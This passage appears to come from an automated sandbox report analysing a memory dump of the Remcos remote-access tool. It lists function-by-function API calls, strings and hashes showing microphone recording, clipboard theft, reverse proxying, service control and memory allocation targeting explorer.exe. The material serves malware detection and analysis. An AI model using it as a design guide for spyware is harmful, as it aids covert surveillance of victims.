                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                    • String ID: CloseChat$DisplayMessage$GetMessage
                                    • API String ID: 2956720200-749203953
                                    • Opcode ID: 7f992be55c97d4a0d80315e1b55b0244d02f84aa110889cbca582f0a3d17256f
                                    • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                    • Opcode Fuzzy Hash: 7f992be55c97d4a0d80315e1b55b0244d02f84aa110889cbca582f0a3d17256f
                                    • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                    • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                    • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                    • String ID: 0VG$0VG$<$@$Temp
                                    • API String ID: 1704390241-2575729100
                                    • Opcode ID: 6f6b6ebf27fedb738aceabdcac13e206b780a78d8e5b152ac6f35e1b1749394a
                                    • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                    • Opcode Fuzzy Hash: 6f6b6ebf27fedb738aceabdcac13e206b780a78d8e5b152ac6f35e1b1749394a
                                    • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenClipboard.USER32 ref: 00416941
                                    • EmptyClipboard.USER32 ref: 0041694F
                                    • CloseClipboard.USER32 ref: 00416955
                                    • OpenClipboard.USER32 ref: 0041695C
                                    • GetClipboardData.USER32(0000000D), ref: 0041696C
                                    • GlobalLock.KERNEL32(00000000), ref: 00416975
                                    • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                    • CloseClipboard.USER32 ref: 00416984
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                    • String ID: !D@
                                    • API String ID: 2172192267-604454484
                                    • Opcode ID: 93349cd1f58038fe6e893b2ed0969c7065e068f09567d1adcf92a67e7a90f973
                                    • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                    • Opcode Fuzzy Hash: 93349cd1f58038fe6e893b2ed0969c7065e068f09567d1adcf92a67e7a90f973
                                    • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004132D2 Relevance: 15.2, APIs: 10, Instructions: 153fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
                                    • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
                                    • GetFileSize.KERNEL32(?,00000000), ref: 00413432
                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
                                    • CloseHandle.KERNEL32(00000000), ref: 0041345F
                                    • CloseHandle.KERNEL32(?), ref: 00413465
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandleView$CreateMappingSizeUnmap
                                    • String ID:
                                    • API String ID: 297527592-0
                                    • Opcode ID: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                                    • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
                                    • Opcode Fuzzy Hash: 7389cf943c6bcf248480826047218ee6b0a919d85f38051736b06d81fd75e68c
                                    • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                    • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                    • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                    • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Service$CloseHandle$Open$ControlManager
                                    • String ID:
                                    • API String ID: 221034970-0
                                    • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                    • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                    • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                    • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 00448135
                                      • Part of subcall function 00446782: RtlFreeHeap.NTDLL(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                      • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                    • _free.LIBCMT ref: 00448141
                                    • _free.LIBCMT ref: 0044814C
                                    • _free.LIBCMT ref: 00448157
                                    • _free.LIBCMT ref: 00448162
                                    • _free.LIBCMT ref: 0044816D
                                    • _free.LIBCMT ref: 00448178
                                    • _free.LIBCMT ref: 00448183
                                    • _free.LIBCMT ref: 0044818E
                                    • _free.LIBCMT ref: 0044819C
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                    • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                    • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Eventinet_ntoa
                                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                    • API String ID: 3578746661-3604713145
                                    • Opcode ID: 99e72d212d0662cd44672663293cf7dc5fa51e15c15c5c65b5c40529398bb1cb
                                    • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                    • Opcode Fuzzy Hash: 99e72d212d0662cd44672663293cf7dc5fa51e15c15c5c65b5c40529398bb1cb
                                    • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DecodePointer
                                    • String ID: acos$asin$exp$log$log10$pow$sqrt
                                    • API String ID: 3527080286-3064271455
                                    • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                    • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                    • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                      • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                    • Sleep.KERNEL32(00000064), ref: 00417521
                                    • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreateDeleteExecuteShellSleep
                                    • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                    • API String ID: 1462127192-2001430897
                                    • Opcode ID: 48947f3fb1223555cb99bc666b47910aa3d9768f218f81d75253d5c7f5b6b924
                                    • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                    • Opcode Fuzzy Hash: 48947f3fb1223555cb99bc666b47910aa3d9768f218f81d75253d5c7f5b6b924
                                    • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                    • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\winhlp32.exe), ref: 0040749E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CurrentProcess
                                    • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                    • API String ID: 2050909247-4242073005
                                    • Opcode ID: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                    • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                    • Opcode Fuzzy Hash: 1dcac826a5e52bf6061f4ebfcee704f683c74aacb316ad2bc9bf89965cfe4023
                                    • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                    Download Yara Rule
                                    APIs
                                    • _strftime.LIBCMT ref: 00401D50
                                      • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                    • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                    • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                    • API String ID: 3809562944-243156785
                                    • Opcode ID: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                    • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                    • Opcode Fuzzy Hash: 2a82ab0076c0d6d6c8320c03c1c844241e91b5265a3fceccd43811ae68df0b86
                                    • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                    • int.LIBCPMT ref: 00410E81
                                      • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                      • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                    • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                    • __Init_thread_footer.LIBCMT ref: 00410F29
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                    • String ID: ,kG$0kG
                                    • API String ID: 3815856325-2015055088
                                    • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                    • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                    • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                    • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                    • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                    • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                    • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                    • waveInStart.WINMM ref: 00401CFE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                    • String ID: dMG$|MG$PG
                                    • API String ID: 1356121797-532278878
                                    • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                    • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                    • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                    • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                      • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                    • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                    • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                    • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                    • TranslateMessage.USER32(?), ref: 0041D4E9
                                    • DispatchMessageA.USER32(?), ref: 0041D4F3
                                    • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                    • String ID: Remcos
                                    • API String ID: 1970332568-165870891
                                    • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                    • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                    • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                    • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                    • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                    • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                      • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                      • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                      • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                    • _memcmp.LIBVCRUNTIME ref: 00445423
                                    • _free.LIBCMT ref: 00445494
                                    • _free.LIBCMT ref: 004454AD
                                    • _free.LIBCMT ref: 004454DF
                                    • _free.LIBCMT ref: 004454E8
                                    • _free.LIBCMT ref: 004454F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorLast$_abort_memcmp
                                    • String ID: C
                                    • API String ID: 1679612858-1037565863
                                    • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                    • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                    • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                    • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: tcp$udp
                                    • API String ID: 0-3725065008
                                    • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                    • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                    • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __Init_thread_footer.LIBCMT ref: 004018BE
                                    • ExitThread.KERNEL32 ref: 004018F6
                                    • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                      • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                    • String ID: PkG$XMG$NG$NG
                                    • API String ID: 1649129571-3151166067
                                    • Opcode ID: 35cc2389ebfe272c336abe6e4262d0590b1cbf8cf5c64226a292135f06eab632
                                    • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                    • Opcode Fuzzy Hash: 35cc2389ebfe272c336abe6e4262d0590b1cbf8cf5c64226a292135f06eab632
                                    • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                      • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                    • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                    • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                    • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                    • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                      • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(?,000000FF,?,00474EF8,00404C49,00000000,?,?,?,00474EF8,?), ref: 00404BA5
                                      • Part of subcall function 00404B96: SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000011.00000002.3306521595.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_17_2_400000_winhlp32.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                    • String ID: .part
                                    • API String ID: 1303771098-3499674018
                                    • Opcode ID: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                    • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                    • Opcode Fuzzy Hash: d529a156e2d4aa638270efb6cac6cc48bb231fa92e7fccec4ec34662e1436a09
                                    • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                    • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
